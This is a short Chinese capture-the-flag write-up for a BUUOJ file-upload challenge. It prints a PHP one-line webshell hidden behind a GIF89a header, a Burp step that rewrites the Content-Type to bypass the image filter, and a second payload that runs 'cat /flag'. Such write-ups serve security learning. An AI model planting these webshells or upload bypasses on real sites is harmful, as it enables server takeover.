[极客大挑战 2019]Upload

简单的文件上传漏洞题目

题目要求上传图片那我们就考虑上传一个phtml文件,然后抓包改下上传文件的类型

将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备

GIF89a
<script language="php">eval($_POST['hhz']);</script> 

上面的头是gif的文件头,用来对应对文件的扫描

我们将它上传,使用bp截取,修改一下格式(image/jpeg),再放行

[极客大挑战 2019]Upload

然后直接蚁剑连接就好了,文件应该保存在http://f9c87aea-a976-43d2-af3c-911df1363459.node4.buuoj.cn:81/upload/shell.phtml

所以我们也是直接连接这个网站

 

也可以用cat /flag的一句话木马  <script language='php'>system('cat /flag');</script>

这样直接打开那个保存的网站就可以直接得到flag

[极客大挑战 2019]Upload

 

上一篇:RoarCTF 2019]Easy Calc


下一篇:蓝桥杯真题系列:C语言C组试题D质数